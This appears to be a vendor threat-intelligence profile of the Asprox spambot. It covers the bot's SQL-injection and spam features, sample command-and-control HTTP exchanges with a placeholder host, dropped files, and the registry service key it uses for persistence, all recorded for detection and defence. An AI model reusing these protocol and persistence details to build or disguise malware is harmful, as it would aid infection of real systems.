«  m86security.com

Asprox

 

April 15, 2009

Aliases

  • Danmec (component of Asprox)
  • Hydraflux

Comments

Asprox first came out as a spamming component of a password stealing Trojan known as Danmec. Other than spamming, one of the main features of Asprox is its capability to do SQL injection attacks on legitimate websites, embedding malicious <iframe> tags that point to a malicious URL. Asprox may propagate itself through spam emails with links to a website hosting the Trojan, or by visiting malicious websites. The Pushdo/Cutwail spambot has been observed to spam the downloader Trojan Bredolab which was responsible for distributing the Asprox executable.

Features

  • Template Based spamming engine
  • Fast-fluxing DNS to hide malware hosting sites.
  • SQL Injection attack capability

Spamming Rate

  • unknown

Command and Control

The Asprox bot first tries to send a SYN request to the following websites to check for internet connectivity:

  • ns.uk2.net
  • www.yahoo.com
  • www.web.de

Once the bot receives a SYN/ACK reply from any of the websites, it proceeds to connect to its control server by sending an HTTP request:

POST /forum.php HTTP/1.1
Host: <control server IP address>:80
Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 850

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
4561555111697267
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
638984
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="a_cl"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="p"
80
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
486
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
1015
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{229318B0-AEE3-4402-A785-DF2C862A16DC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
5#2#2#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A--
 

The control server receives the request and replies with an encrypted template:

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Tue, 27 Jan 2009 03:09:17 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Connection: close
Content-Length: 950

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream 
<ENCRYPTED TEMPLATE>

Updated:

As of May 2010, an updated Asprox version uses the following HTTP request:

POST /board.php HTTP/1.1
Host: <control server>:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 603 
The control server now uses Apach/2.2.9 as its server type:
HTTP/1.1 200 OK
Date: Wed, 26 May 2010 15:07:29 GMT
Server: Apache/2.2.9
Content-Length: 133422
Connection: close

Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream 
<ENCRYPTED TEMPLATE>

After the Asprox bot receives its spamming template and list of email address from the control server, it will then proceed with its spamming routine.

Malware Behavior on Host

Asprox drops a copy of itself in the Windows system folder:

  • %SystemDir%\aspimgr.exe (example: C:\Windows\System32\aspimgr.exe)

it then drops a batch file in Windows temporary folder to delete the original executable Trojan.

  • %temp%\_check32.bat

The following encrypted component file was also dropped in the infected system:

  • C:\Windows\db32.txt
  • C:\Windows\s32.txt
  • C:\Windows\ws386.ini

It registers it self as a service by adding the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr
DisplayName = "Microsoft ASPI Manager"
ErrorControl = "1"
ImagePath = "%System%\aspimgr.exe"
ObjectName = "LocalSystem"
Start = "2"
Type = "10"

Addendum:

We have published a detailed analysis on the Asprox reappearance last 5th of June 2010, you can read the details in our blog section, here. Details on the Asprox SQL injection attack can be found here.


Last Reviewed: July 26, 2010 by Rodel Mendrez